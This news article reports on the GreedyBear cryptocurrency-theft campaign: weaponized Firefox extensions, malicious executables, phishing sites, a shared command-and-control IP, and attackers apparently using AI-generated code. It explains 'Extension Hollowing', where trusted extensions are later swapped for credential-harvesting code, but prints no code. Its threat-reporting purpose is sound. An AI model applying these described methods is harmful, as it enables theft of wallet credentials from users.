Biggest Ever GreedyBear Attack With 650 Hacking Tools Stolen $1 Million from Victims

A sophisticated cybercriminal operation known as GreedyBear has orchestrated one of the most extensive cryptocurrency theft campaigns to date, deploying over 650 malicious tools across multiple attack vectors to steal more than $1 million from unsuspecting victims.

Unlike traditional threat groups that typically specialize in single attack methods, GreedyBear has adopted an industrial-scale approach, simultaneously operating malicious browser extensions, distributing hundreds of malware executables, and maintaining elaborate phishing infrastructure.

The campaign represents a significant escalation in cybercriminal operations, utilizing over 150 weaponized Firefox extensions, nearly 500 malicious Windows executables, and dozens of fraudulent websites masquerading as legitimate cryptocurrency services.

All attack components converge on a centralized command-and-control infrastructure, with domains resolving to the IP address 185.208.156.66, enabling streamlined coordination across multiple threat vectors.

What distinguishes GreedyBear from conventional cybercriminal operations is its systematic approach to scaling attacks using artificial intelligence.

Analysis of the campaign’s code reveals clear signatures of AI-generated artifacts, allowing attackers to rapidly produce diverse payloads while evading traditional detection mechanisms.

Koi Security researchers identified this evolution as part of a broader trend where cybercriminals leverage advanced AI tooling to accelerate attack development and deployment.

The threat group’s browser extension strategy employs a sophisticated technique termed “Extension Hollowing” to circumvent marketplace security controls.

Rather than attempting to sneak malicious extensions past initial reviews, operators first establish legitimate publisher profiles by uploading innocuous utilities such as link sanitizers and YouTube downloaders.

After accumulating positive reviews and user trust, they systematically “hollow out” these extensions, replacing legitimate functionality with credential-harvesting code while preserving the established reputation.

Advanced Credential Harvesting Mechanisms

The weaponized extensions demonstrate remarkable technical sophistication in their credential extraction capabilities.

Each malicious extension targets popular cryptocurrency wallets including MetaMask, TronLink, Exodus, and Rabby Wallet by precisely mimicking their authentic interfaces.

The malware captures wallet credentials directly from user input fields within the extension’s popup interface, employing JavaScript functions that intercept form submissions before they reach legitimate validation processes.

During initialization, the extensions execute additional surveillance functions, transmitting victims’ external IP addresses to remote servers for tracking and potential targeting purposes.

This data collection enables operators to build comprehensive victim profiles while maintaining operational security through distributed infrastructure.

The code snippets reveal standardized credential exfiltration routines across all extensions, suggesting centralized development and deployment protocols that enable rapid scaling of malicious operations while maintaining consistency in attack execution.

Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial